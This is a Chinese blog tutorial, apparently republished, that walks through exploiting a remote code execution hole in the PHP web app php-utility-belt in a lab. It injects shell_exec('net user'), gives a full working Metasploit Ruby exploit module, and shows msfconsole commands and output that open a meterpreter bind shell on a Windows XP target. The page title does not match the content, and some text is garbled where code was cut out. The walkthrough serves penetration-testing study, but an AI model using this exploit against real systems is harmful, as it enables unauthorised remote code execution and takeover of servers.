java中的接口是类吗
231
2022-10-02
渗透之——Metasploit渗透php-utility-belt程序(metasploit渗透linux系统)
攻击机 kali 192.168.109.137
靶机:Win XP 192.168.109.141
应用程序 php-utility-belt (可以到链接下载)
1.部署php-utility-belt
由于php-utility-belt是php程序,所以我们需要安装php环境,这里我为了简单直接安装了wamp环境。
将php-utility-belt解压后放在wamp的$a = "net user"; echo shell_exec($a);?>');
3.查看php-utility-belt下的文件
此时,我们发现php-utility-belt下多了一个info.php文件
我们查看这个文件的内容:
4.访问info.php
我们在浏览器中输入:访问info.php。
这里,会显示靶机上的所有用户,说明php-utility-belt存在漏洞。
5.进一步分析php-utility-belt的漏洞
在google或firefox浏览器按下F12键,通过对网页代码的分析,文本框中的数据是通过参数code进行post提交的。
6.编写攻击脚本php_utility_belt_attack_by_binghe.rb
### Author 冰河# Date 2019-01-17# Description Metasploit渗透 php utility belt##require 'msf/core'class Metasploit4 < Msf::Exploit::Remote include Msf:: Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Utility Belt Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in P }, 'Author' => [ 'binghe' ], 'DisclosureDate' => '2019-01-17', 'Platform' => 'php', 'Payload' => { 'Space' => 2000, # 现在的漏洞在一个Web应用程序中,而不是在软件程序中,所以要将DisableNops的值设置为true以关闭攻击载荷中的NOP 'DisableNops' => true }, 'Targets' => [ ['PHP Utility Belt', {}] ], 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']), OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']), ], self.class) end def check send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'code' => "fwrite(fopen('info.php','w'), '');" } ) resp = send_request_raw({'uri' => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'}) if resp.body = ~/phpinfo()/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'code' => payload.encoded } ) end end
7.上传攻击脚本php_utility_belt_attack_by_binghe.rb
将攻击脚本php_utility_belt_attack_by_binghe.rb上传的Kali的/usr/share/metasploit-framework/modules/exploits/web/php目录下。
8.运行攻击脚本php_utility_belt_attack_by_binghe.rb
msfconsoleuse exploit/web/php/php_utility_belt_attack_by_binghe set payload php/meterpreter/bind_tcpset RHOST 192.168.109.141show optionsexploitsysinfo
具体操作效果如下:
msf > use exploit/web/php/php_utility_belt_attack_by_binghe msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcppayload => php/meterpreter/bind_tcpmsf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141RHOST => 192.168.109.141msf exploit(web/php/php_utility_belt_attack_by_binghe) > show optionsModule options (exploit/web/php/php_utility_belt_attack_by_binghe): Name Current Setting Required Description ---- --------------- -------- ----------- CHECKURI /php-utility-belt/info.php no Checking Perpose Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.109.141 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /php-utility-belt/ajax.php yes The path to PHP Utility Belt VHOST no HTTP server virtual hostPayload options (php/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.109.141 no The target addressExploit target: Id Name -- ---- 0 PHP Utility Beltmsf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit[*] Started bind TCP handler against 192.168.109.141:4444[*] Sending stage (38247 bytes) to 192.168.109.141meterpreter > sysinfoComputer : LIUYAZHUANGOS : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586Meterpreter : php/windowsmeterpreter >
到此,我们已经拿到了靶机的Shell,后续就可以进行各种渗透操作了。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~